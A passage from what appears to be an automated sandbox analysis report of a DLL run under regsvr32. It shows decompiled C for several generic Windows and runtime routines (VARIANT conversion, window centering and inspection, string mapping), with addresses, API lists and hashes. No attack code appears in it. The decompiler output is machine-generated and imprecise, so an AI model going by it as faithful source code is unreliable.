						_t242 =  *(_t247 + 0x10);
						__eflags = _t242;
						if(_t242 != 0) {
							__eflags = _t242 - 0xc;
							if(_t242 != 0xc) {
								_t174 = _t247 - 0x3c;
								__imp__#12(_t174, _t174, 0, _t242);
								_t236 = _t174;
								__eflags = _t236;
								if(_t236 < 0) {
									__imp__#9(_t247 - 0x3c);
									_push(_t236);
									goto L67;
								}
							}
							goto L68;
						}
					} else {
						__imp__#9(_t247 - 0x3c);
						if( *(_t247 + 0x18) == 0x80020009) {
							__eflags =  *(_t247 - 0x54);
							if( *(_t247 - 0x54) != 0) {
								 *(_t247 - 0x54)(_t247 - 0x6c);
							}
							_t178 = E1001F51F(0x20);
							_pop(_t221);
							 *(_t247 + 0x14) = _t178;
							__eflags = _t178;
							 *(_t247 - 4) = 0;
							if(_t178 == 0) {
								_t243 = 0;
								__eflags = 0;
							} else {
								_push( *((intOrPtr*)(_t247 - 0x6c)));
								_t221 = _t178;
								_push(0);
								_push(0);
								_t243 = E10029EA7(_t178);
							}
							 *(_t247 - 4) =  *(_t247 - 4) | 0xffffffff;
							__eflags =  *(_t247 - 0x68);
							_t237 = __imp__#6;
							if( *(_t247 - 0x68) != 0) {
								_t113 = _t243 + 0x18; // 0x18
								_t221 = _t113;
								E10008D7F(_t113,  *(_t247 - 0x68));
								 *_t237( *(_t247 - 0x68));
							}
							__eflags =  *(_t247 - 0x64);
							if( *(_t247 - 0x64) != 0) {
								_t117 = _t243 + 0xc; // 0xc
								_t221 = _t117;
								E10008D7F(_t117,  *(_t247 - 0x64));
								 *_t237( *(_t247 - 0x64));
							}
							__eflags =  *(_t247 - 0x60);
							if( *(_t247 - 0x60) != 0) {
								_t121 = _t243 + 0x14; // 0x14
								_t221 = _t121;
								E10008D7F(_t121,  *(_t247 - 0x60));
								 *_t237( *(_t247 - 0x60));
							}
							 *((intOrPtr*)(_t243 + 0x10)) =  *((intOrPtr*)(_t247 - 0x5c));
							 *((intOrPtr*)(_t243 + 0x1c)) =  *((intOrPtr*)(_t247 - 0x50));
							 *(_t247 + 0x14) = _t243;
							_t161 = E100125AC(_t247 + 0x14, 0x100335f0);
							goto L63;
						} else {
							_push( *(_t247 + 0x18));
							L67:
							E10028C2C(_t221);
							L68:
							_t161 = (_t242 & 0x0000ffff) + 0xfffffffe;
							if(_t161 <= 0x13) {
								switch( *((intOrPtr*)(_t161 * 4 +  &M1002A48A))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 1:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x34);
										goto L79;
									case 4:
										__ecx =  *(__ebp - 0x34);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x34);
										__ecx =  *(__ebp - 0x30);
										 *(__eax + 4) =  *(__ebp - 0x30);
										goto L79;
									case 5:
										__eax = E1002888F(__eax,  *(__ebp + 0x14),  *(__ebp - 0x34));
										_push( *(__ebp - 0x34));
										__imp__#6();
										goto L79;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x34) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *( *(__ebp + 0x14)) = __eflags != 0;
										goto L79;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x3c;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L79;
									case 8:
										goto L79;
									case 9:
										_t161 =  *(_t247 + 0x14);
										 *_t161 =  *((intOrPtr*)(_t247 - 0x34));
										goto L79;
								}
							}
						}
					}
				}
				L79:
				 *[fs:0x0] =  *((intOrPtr*)(_t247 - 0xc));
				return _t161;
			}

0x10029f7e
0x10029f83
0x10029f8b
0x10029f8e
0x10029f94
0x10029f98
0x10029f9b
0x10029fa8
0x10029fad
0x10029fb0
0x10029fb5
0x10029fc3
0x10029fb7
0x10029fb8
0x10029fbe
0x10029fbe
0x10029fca
0x10029fd1
0x10029fd6
0x10029fdd
0x10029fdd
0x10029fe2
0x10029ff1
0x10029ffc
0x10029fff
0x1002a00a
0x1002a010
0x1002a014
0x1002a017
0x1002a01a
0x1002a020
0x1002a023
0x1002a026
0x1002a026
0x1002a02e
0x1002a031
0x1002a034
0x1002a035
0x1002a038
0x1002a03e
0x1002a041
0x1002a044
0x1002a04e
0x1002a04e
0x1002a051
0x1002a059
0x1002a05b
0x1002a18b
0x1002a190
0x1002a193
0x1002a195
0x00000000
0x00000000
0x00000000
0x1002a19c
0x1002a19f
0x1002a1a1
0x1002a1a7
0x1002a1af
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a195
0x1002a061
0x1002a061
0x1002a1b3
0x1002a1b3
0x1002a1b6
0x1002a1b6
0x1002a1b8
0x1002a1ba
0x1002a1ba
0x1002a067
0x1002a068
0x1002a06c
0x1002a072
0x00000000
0x1002a079
0x1002a07c
0x1002a07e
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a0a7
0x1002a0ab
0x1002a0b0
0x1002a0b3
0x00000000
0x00000000
0x1002a0ba
0x1002a0be
0x1002a0c3
0x1002a0c6
0x00000000
0x00000000
0x1002a0cd
0x1002a0d0
0x1002a0d0
0x1002a0d2
0x1002a0d4
0x00000000
0x00000000
0x1002a0e3
0x1002a0e6
0x1002a0e8
0x1002a0ea
0x1002a0eb
0x1002a0ee
0x1002a0f4
0x1002a0f8
0x1002a0fa
0x1002a100
0x1002a102
0x00000000
0x00000000
0x1002a102
0x00000000
0x00000000
0x1002a163
0x1002a166
0x1002a16a
0x1002a16c
0x1002a081
0x1002a081
0x00000000
0x00000000
0x1002a173
0x1002a177
0x1002a17a
0x1002a17d
0x1002a17f
0x1002a180
0x1002a181
0x1002a182
0x1002a183
0x1002a186
0x1002a188
0x00000000
0x00000000
0x1002a10d
0x1002a10d
0x1002a110
0x1002a112
0x1002a114
0x1002a116
0x1002a119
0x1002a11e
0x1002a124
0x1002a125
0x1002a128
0x1002a12a
0x1002a12d
0x1002a12d
0x1002a135
0x1002a141
0x1002a141
0x1002a146
0x1002a147
0x1002a14d
0x1002a151
0x1002a153
0x1002a155
0x1002a157
0x1002a108
0x1002a108
0x00000000
0x1002a108
0x1002a157
0x1002a159
0x1002a15c
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a099
0x1002a09c
0x1002a0a0
0x00000000
0x00000000
0x1002a089
0x1002a08c
0x1002a08f
0x1002a091
0x1002a094
0x1002a0d6
0x1002a0d6
0x1002a0db
0x00000000
0x00000000
0x1002a072
0x1002a06c
0x1002a061
0x1002a1bc
0x1002a1bc
0x1002a1c0
0x1002a1c3
0x1002a1cc
0x1002a1cc
0x1002a1d5
0x1002a1d8
0x1002a1d8
0x1002a01a
0x1002a1de
0x1002a1e0
0x1002a1e9
0x1002a1eb
0x1002a1eb
0x1002a1f5
0x1002a1fd
0x1002a1ff
0x1002a225
0x1002a228
0x1002a22d
0x1002a238
0x1002a23c
0x1002a23e
0x1002a240
0x1002a240
0x1002a244
0x1002a24b
0x1002a24b
0x1002a251
0x1002a254
0x1002a255
0x1002a255
0x1002a240
0x1002a23e
0x1002a25a
0x1002a25d
0x1002a267
0x1002a268
0x1002a31f
0x1002a31f
0x1002a322
0x1002a325
0x1002a32b
0x1002a32f
0x1002a333
0x1002a338
0x1002a33e
0x1002a340
0x1002a342
0x1002a348
0x1002a34e
0x00000000
0x1002a34e
0x1002a342
0x00000000
0x1002a32f
0x1002a26e
0x1002a272
0x1002a27f
0x1002a289
0x1002a28c
0x1002a292
0x1002a292
0x1002a297
0x1002a29c
0x1002a29d
0x1002a2a0
0x1002a2a2
0x1002a2a5
0x1002a2b7
0x1002a2b7
0x1002a2a7
0x1002a2a7
0x1002a2aa
0x1002a2ac
0x1002a2ad
0x1002a2b3
0x1002a2b3
0x1002a2b9
0x1002a2bd
0x1002a2c0
0x1002a2c6
0x1002a2cb
0x1002a2cb
0x1002a2ce
0x1002a2d6
0x1002a2d6
0x1002a2d8
0x1002a2db
0x1002a2e0
0x1002a2e0
0x1002a2e3
0x1002a2eb
0x1002a2eb
0x1002a2ed
0x1002a2f0
0x1002a2f5
0x1002a2f5
0x1002a2f8
0x1002a300
0x1002a300
0x1002a305
0x1002a30b
0x1002a317
0x1002a31a
0x00000000
0x1002a281
0x1002a281
0x1002a34f
0x1002a34f
0x1002a354
0x1002a357
0x1002a35d
0x1002a35f
0x00000000
0x1002a370
0x1002a377
0x00000000
0x00000000
0x1002a3d2
0x1002a3d5
0x1002a3d8
0x00000000
0x00000000
0x1002a38f
0x1002a392
0x00000000
0x00000000
0x1002a399
0x1002a39c
0x00000000
0x00000000
0x1002a37c
0x1002a37f
0x1002a382
0x1002a384
0x1002a387
0x00000000
0x00000000
0x1002a3a6
0x1002a3ab
0x1002a3ae
0x00000000
0x00000000
0x1002a3b6
0x1002a3b9
0x1002a3bb
0x1002a3bf
0x1002a3c2
0x00000000
0x00000000
0x1002a3c6
0x1002a3c9
0x1002a3cc
0x1002a3cd
0x1002a3ce
0x1002a3cf
0x00000000
0x00000000
0x00000000
0x00000000
0x1002a366
0x1002a36c
0x00000000
0x00000000
0x1002a35f
0x1002a35d
0x1002a27f
0x1002a268
0x1002a3da
0x1002a3e0
0x1002a3eb

APIs

__EH_prolog.LIBCMT ref: 10029F7E
lstrlenA.KERNEL32(?,?,?), ref: 10029FB8
VariantClear.OLEAUT32(?), ref: 1002A24B
VariantClear.OLEAUT32(?), ref: 1002A272
SysFreeString.OLEAUT32(?), ref: 1002A2D6
SysFreeString.OLEAUT32(?), ref: 1002A2EB
SysFreeString.OLEAUT32(?), ref: 1002A300
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1002A338
VariantClear.OLEAUT32(?), ref: 1002A348

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Variant$ClearFreeString$ChangeH_prologTypelstrlen
String ID:
API String ID: 344392101-0
Opcode ID: 9f045b6e43f5a4d57dedb6d61a5921109a806fdd94788b071b8aeac36768e6b8
Instruction ID: a9662718b04f73c614da94a587231cb4e0efe2d963c3f66c1e6f28ec21cf51de
Opcode Fuzzy Hash: 9f045b6e43f5a4d57dedb6d61a5921109a806fdd94788b071b8aeac36768e6b8
Instruction Fuzzy Hash: 80E16C7190061ADFDF10CFA8E88099EBBB5FF06350F644419F951A7250DB74AE96CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002037B Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1002037B(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E100229FB(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E1000818F(E10008124(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E10006E47();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E1000818F(E10008124(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E10022C1F(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

0x1002037b
0x10020383
0x10020386
0x1002038e
0x10020391
0x10020396
0x100203a1
0x100203b3
0x100203a3
0x100203a6
0x100203a6
0x100203b9
0x100203bd
0x100203c9
0x100203d1
0x100203d3
0x100203d3
0x100203d1
0x10020398
0x10020398
0x10020398
0x100203e2
0x100203e8
0x10020488
0x1002048f
0x10020496
0x100204a0
0x100203ee
0x100203f0
0x100203f5
0x10020400
0x10020409
0x10020409
0x10020400
0x1002040d
0x10020414
0x10020455
0x10020464
0x10020471
0x10020416
0x10020416
0x1002041d
0x1002041f
0x1002041f
0x1002042f
0x10020442
0x1002044c
0x1002044c
0x10020414
0x100204af
0x100204b4
0x100204ba
0x100204c1
0x100204c4
0x100204cb
0x100204d2
0x100204d9
0x100204e0
0x100204e5
0x100204ec
0x100204f3
0x100204fb
0x100204fb
0x100204e7
0x100204e7
0x100204e7
0x10020500
0x1002050c
0x10020514
0x10020514
0x10020502
0x10020502
0x10020502
0x1002052d

APIs

Part of subcall function 100229FB: GetWindowLongA.USER32 ref: 10022A06

GetParent.USER32(?), ref: 100203A6
SendMessageA.USER32 ref: 100203C9
GetWindowRect.USER32 ref: 100203E2
GetWindowLongA.USER32 ref: 100203F5
CopyRect.USER32 ref: 10020442
CopyRect.USER32 ref: 1002044C
GetWindowRect.USER32 ref: 10020455
CopyRect.USER32 ref: 10020471

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: bc2a5c29a247466f5fd0cf6475133174012110fed443119257e5413e9f092649
Instruction ID: 056421046f6a32db6b1cc4d962777815c3d1ad92550405ad8a13814199706d5f
Opcode Fuzzy Hash: bc2a5c29a247466f5fd0cf6475133174012110fed443119257e5413e9f092649
Instruction Fuzzy Hash: 34512072900619AFDB11DBA8DC85EEEBBBEEF44350F554115FA01F3192DB30E9468B50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E20 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E10005E20(void* __ecx, struct HWND__* _a4) {
				char _v256;
				char _v344;
				char _v512;
				char _v552;
				char _v768;
				char _v844;
				char _v1024;
				char _v1088;
				char _v1280;
				char _v1332;
				char _v1536;
				struct tagRECT _v1552;
				char _v1564;
				int _t34;
				char* _t35;
				void* _t71;
				struct HWND__* _t72;

				_t72 = _a4;
				_t71 = __ecx;
				GetClassNameA(_t72,  &_v1024, 0x100);
				GetWindowTextA(_t72,  &_v1536, 0x100);
				GetWindowRect(_t72,  &_v1552);
				E10011245( &_v512, "%04d", _t72);
				_push(_v1552.top);
				E10011245( &_v768, "%04d, %04d", _v1552.left);
				_push(_v1552.bottom - _v1552.top);
				E10011245( &_v256, "%04dx%04d", _v1552.right - _v1552.left);
				_t34 = IsWindowVisible(_t72);
				_t35 = "Visible";
				if(_t34 == 0) {
					_t35 = "Hidden";
				}
				_push(_t35);
				_push( &_v1280);
				E10011245();
				if(GetWindowTextLengthA(_t72) == 0) {
					_push("<Not Set>");
					_push( &_v1536);
					E10011245();
				}
				_t73 = _t71 + 0x9b0;
				E1001D448(_t71 + 0x9b0, 1, 0, 0, 0, 0, 0, 0);
				E1001D300(_t71 + 0x9b0, 0, 0,  &_v1564);
				E1001D300(_t71 + 0x9b0, 0, 1,  &_v552);
				E1001D300(_t73, 0, 2,  &_v1332);
				E1001D300(_t73, 0, 3,  &_v1088);
				E1001D300(_t73, 0, 4,  &_v844);
				E1001D300(_t73, 0, 5,  &_v344);
				return 1;
			}

0x10005e27
0x10005e3d
0x10005e3f
0x10005e50
0x10005e5c
0x10005e70
0x10005e7d
0x10005e8c
0x10005e9f
0x10005eb2
0x10005ebb
0x10005ec3
0x10005ec8
0x10005eca
0x10005eca
0x10005ecf
0x10005ed7
0x10005ed8
0x10005ee9
0x10005eef
0x10005ef4
0x10005ef5
0x10005efa
0x10005f09
0x10005f13
0x10005f23
0x10005f36
0x10005f49
0x10005f5c
0x10005f6f
0x10005f82
0x10005f94

APIs

GetClassNameA.USER32(?,?,00000100), ref: 10005E3F
GetWindowTextA.USER32 ref: 10005E50
GetWindowRect.USER32 ref: 10005E5C
IsWindowVisible.USER32 ref: 10005EBB
GetWindowTextLengthA.USER32(?), ref: 10005EE1

Strings

%04dx%04d, xrefs: 10005EAC
%04d, xrefs: 10005E6A
<Not Set>, xrefs: 10005EEF
Hidden, xrefs: 10005ECA
%04d, %04d, xrefs: 10005E86
Visible, xrefs: 10005EC3, 10005ECF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Text$ClassLengthNameRectVisible
String ID: %04d$%04d, %04d$%04dx%04d$<Not Set>$Hidden$Visible
API String ID: 1863070929-3888214909
Opcode ID: 8058c32e30631926eec03c10e0ccb65e8d38ac2abf2ffc5f940e8fd6f4df4f5e
Instruction ID: 0909732d0e773ac3d42f51162f30a16be28a964636113b23e373a0c541e67195
Opcode Fuzzy Hash: 8058c32e30631926eec03c10e0ccb65e8d38ac2abf2ffc5f940e8fd6f4df4f5e
Instruction Fuzzy Hash: DD3192712507546BE228EB60CC86FEF73ADDBC8B00F40481DF7459A181DBB4B68687E6

Uniqueness

Uniqueness Score: -1.00%

Function 1001467C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E1001467C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t75;
				int _t76;
				int _t77;
				int _t83;
				char* _t95;
				int _t96;
				int _t97;
				signed int _t98;
				void* _t106;
				signed int _t110;
				char* _t114;
				int _t116;
				void* _t117;
				char* _t118;
				intOrPtr _t122;

				_push(0x24);
				_push(0x1002e9d0);
				E10012CE0(__ebx, __edi, __esi);
				_t122 =  *0x1003a1d8; // 0x0
				if(_t122 == 0) {
					if(LCMapStringW(0, 0x100, 0x1002e9cc, 1, 0, 0) == 0) {
						if(GetLastError() == 0x78) {
							 *0x1003a1d8 = 2;
						}
					} else {
						 *0x1003a1d8 = 1;
					}
				}
				if( *(_t117 + 0x14) <= 0) {
					L11:
					_t75 =  *0x1003a1d8; // 0x0
					if(_t75 != 1) {
						if(_t75 == 2 || _t75 == 0) {
							 *(_t117 - 0x24) = 0;
							 *((intOrPtr*)(_t117 - 0x2c)) = 0;
							 *(_t117 - 0x28) = 0;
							if( *(_t117 + 8) == 0) {
								_t97 =  *0x1003a4c0; // 0x0
								 *(_t117 + 8) = _t97;
							}
							if( *(_t117 + 0x20) == 0) {
								_t96 =  *0x1003a4d0; // 0x0
								 *(_t117 + 0x20) = _t96;
							}
							_t76 = E10019AB4( *(_t117 + 8));
							_pop(_t106);
							if( *(_t117 + 0x20) != _t76 && _t76 != 0xffffffff) {
								 *(_t117 + 0x20) = _t76;
							}
							_t77 = WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14), 0, 0, 0, 0);
							 *(_t117 - 0x20) = _t77;
							if(_t77 != 0) {
								 *(_t117 - 4) = 0;
								E100116D0(_t77 + 0x00000003 & 0xfffffffc, _t106);
								 *(_t117 - 0x18) = _t118;
								 *(_t117 - 0x1c) = _t118;
								 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
								if( *(_t117 - 0x1c) != 0) {
									L28:
									if(WideCharToMultiByte( *(_t117 + 0x20), 0,  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0) == 0) {
										L44:
										_t114 =  *(_t117 - 0x34);
										L45:
										if( *(_t117 - 0x28) != 0) {
											_push(_t114);
											E1001111B();
										}
										if( *((intOrPtr*)(_t117 - 0x2c)) != 0) {
											_push( *(_t117 - 0x1c));
											E1001111B();
										}
										_t83 =  *(_t117 - 0x24);
										goto L50;
									}
									_t116 = LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), 0, 0);
									 *(_t117 - 0x30) = _t116;
									if(_t116 == 0) {
										goto L44;
									}
									 *(_t117 - 4) = 1;
									E100116D0(_t87 + 0x00000003 & 0xfffffffc, _t106);
									 *(_t117 - 0x18) = _t118;
									_t114 = _t118;
									 *(_t117 - 0x34) = _t114;
									 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
									if(_t114 != 0) {
										L34:
										if(LCMapStringA( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 - 0x1c),  *(_t117 - 0x20), _t114, _t116) != 0) {
											if(( *(_t117 + 0xd) & 0x00000004) == 0) {
												if( *(_t117 + 0x1c) != 0) {
													_push( *(_t117 + 0x1c));
													_push( *(_t117 + 0x18));
												} else {
													_push(0);
													_push(0);
												}
												 *(_t117 - 0x24) = MultiByteToWideChar( *(_t117 + 0x20), 1, _t114, _t116, ??, ??);
											} else {
												 *(_t117 - 0x24) = _t116;
												if( *(_t117 + 0x1c) != 0) {
													if( *(_t117 + 0x1c) < _t116) {
														_t116 =  *(_t117 + 0x1c);
													}
													E10019990( *(_t117 + 0x18), _t114, _t116);
												}
											}
										}
										goto L45;
									} else {
										_t114 = E10011233(_t116);
										if(_t114 == 0) {
											goto L45;
										}
										 *(_t117 - 0x28) = 1;
										goto L34;
									}
								} else {
									_t95 = E10011233( *(_t117 - 0x20));
									_pop(_t106);
									 *(_t117 - 0x1c) = _t95;
									if(_t95 == 0) {
										goto L23;
									}
									 *((intOrPtr*)(_t117 - 0x2c)) = 1;
									goto L28;
								}
							} else {
								goto L23;
							}
						} else {
							L23:
							_t83 = 0;
							L50:
							return E10012D1B(_t83);
						}
					}
					_t83 = LCMapStringW( *(_t117 + 8),  *(_t117 + 0xc),  *(_t117 + 0x10),  *(_t117 + 0x14),  *(_t117 + 0x18),  *(_t117 + 0x1c));
					goto L50;
				}
				_t110 =  *(_t117 + 0x14);
				_t98 =  *(_t117 + 0x10);
				while(1) {
					_t110 = _t110 - 1;
					if( *_t98 == 0) {
						break;
					}
					_t98 = _t98 + 2;
					if(_t110 != 0) {
						continue;
					}
					_t110 = _t110 | 0xffffffff;
					break;
				}
				 *(_t117 + 0x14) =  *(_t117 + 0x14) + (_t98 | 0xffffffff) - _t110;
				goto L11;
			}

0x1001467c
0x1001467e
0x10014683
0x1001468d
0x10014693
0x100146ab
0x100146be
0x100146c0
0x100146c0
0x100146ad
0x100146ad
0x100146ad
0x100146ab
0x100146cd
0x100146ec
0x100146ec
0x100146f3
0x10014715
0x1001471b
0x1001471e
0x10014721
0x10014727
0x10014729
0x1001472e
0x1001472e
0x10014734
0x10014736
0x1001473b
0x1001473b
0x10014741
0x10014746
0x1001474a
0x10014751
0x10014751
0x10014762
0x10014768
0x1001476d
0x10014776
0x1001477f
0x10014784
0x10014789
0x1001478c
0x100147ad
0x100147c2
0x100147dc
0x100148ac
0x100148ac
0x100148af
0x100148b2
0x100148b4
0x100148b5
0x100148ba
0x100148be
0x100148c0
0x100148c3
0x100148c8
0x100148c9
0x00000000
0x100148c9
0x100147f6
0x100147f8
0x100147fd
0x00000000
0x00000000
0x10014803
0x1001480c
0x10014811
0x10014814
0x10014816
0x10014819
0x10014838
0x1001484e
0x10014864
0x1001486a
0x1001488e
0x10014894
0x10014897
0x10014890
0x10014890
0x10014891
0x10014891
0x100148a7
0x1001486c
0x1001486c
0x10014872
0x10014877
0x10014879
0x10014879
0x10014881
0x10014886
0x10014872
0x1001486a
0x00000000
0x1001483a
0x10014841
0x10014845
0x00000000
0x00000000
0x10014847
0x00000000
0x10014847
0x100147af
0x100147b2
0x100147b7
0x100147b8
0x100147bd
0x00000000
0x00000000
0x100147bf
0x00000000
0x100147bf
0x00000000
0x00000000
0x00000000
0x1001476f
0x1001476f
0x1001476f
0x100148cc
0x100148d4
0x100148d4
0x10014715
0x10014707
0x00000000
0x10014707
0x100146cf
0x100146d2
0x100146d5
0x100146d5
0x100146d9
0x00000000
0x00000000
0x100146dc
0x100146df
0x00000000
0x00000000
0x100146e1
0x00000000
0x100146e1
0x100146e9
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,1002E9CC,00000001,00000000,00000000,1002E9D0,00000024,10011077,?,00000100,?,000000FF,00000000,00000000,?), ref: 100146A3
GetLastError.KERNEL32(?,?), ref: 100146B5
LCMapStringW.KERNEL32(?,?,?,?,?,?,1002E9D0,00000024,10011077,?,00000100,?,000000FF,00000000,00000000,?), ref: 10014707
WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,1002E9D0,00000024,10011077,?,00000100,?,000000FF,00000000), ref: 10014762
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 100147D4
LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000,?,?), ref: 100147F0
LCMapStringA.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 1001485C
_strncpy.LIBCMT ref: 10014881

Strings

@hvpYv, xrefs: 10014762, 100147D4

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast_strncpy
String ID: @hvpYv
API String ID: 4089183155-2766943729
Opcode ID: e301e7b9d994c16e817d1b18ad888207c882d149549df77b0cb176b4ec3c0a23
Instruction ID: be8df16c5dd18856016043c6e36cd0761b94307408ad1c360d8757dfebd17d40
Opcode Fuzzy Hash: e301e7b9d994c16e817d1b18ad888207c882d149549df77b0cb176b4ec3c0a23
Instruction Fuzzy Hash: A5714B7180025AEFDF11DFA0CC859DE7BB5FB09394B22412AF925AA1B0CB35CD91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001F2BB Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

